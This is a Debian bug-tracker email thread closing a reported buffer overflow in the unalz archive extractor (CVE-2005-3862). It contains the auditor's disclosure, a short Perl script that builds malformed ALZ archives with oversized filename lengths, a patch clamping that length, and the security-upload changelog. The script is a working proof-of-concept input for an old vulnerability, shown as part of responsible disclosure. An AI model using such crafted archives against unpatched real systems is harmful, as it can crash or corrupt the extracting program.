Your message dated Wed, 15 Mar 2006 00:37:19 -0800
with message-id <[EMAIL PROTECTED]>
and subject line unalz: buffer overflow when extracting archives
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message ---
Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid
Hello,
I have found a buffer overflow security vulnerability in unalz. It
occurs when it extracts malicious ALZ archives.
I have attached the archives oflow333.alz (for sarge) and oflow1621.alz
(for testing and unstable), as well as the program alzgen.pl that
generated them and a patch that corrects this issue.
It is also possible to upgrade to the latest upstream version 0.53,
which also corrects it.
// Ulf Härnhammar, Debian Security Audit Project
-- System Information:
Debian Release: testing/unstable
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Versions of packages unalz depends on:
ii libc6 2.3.5-8 GNU C Library: Shared libraries an
ii libgcc1 1:4.0.2-2 GCC support library
ii libstdc++6 4.0.2-2 The GNU Standard C++ Library v3
unalz recommends no packages.
-- no debconf information
oflow333.alz
Description: Binary data
oflow1621.alz
Description: Binary data
#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
$len = shift;
$lenhi = int($len / 256);
$lenlo = $len - ($lenhi * 256);
$file = shift;
open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" . # SIG_LOCAL_FILE_HEADER
chr($lenlo) . chr($lenhi) . # filename length
"\x00" x 7 .
'U' x $len;
close OUT or die "can't close file!?!?\n";
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
return FALSE;
}
FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+ if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+ zipHeader.head.fileNameLength = MAX_PATH - 5;
zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
--- End Message ---
--- Begin Message ---
Version: 0.30.1
This bug was fixed in a security upload to stable; marking as closed in that
version.
The changelog entry for this upload was:
unalz (0.30.1) stable-security; urgency=high
.
* Non-maintainer upload by the Security Team
* Fix buffer overflow in file name handling, discovered by Ulf Härnhammar
(CVE-2005-3862)
The bug appears to still apply to the version of the package in unstable,
and is marked as such.
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
[EMAIL PROTECTED] http://www.debian.org/
signature.asc
Description: Digital signature
--- End Message ---
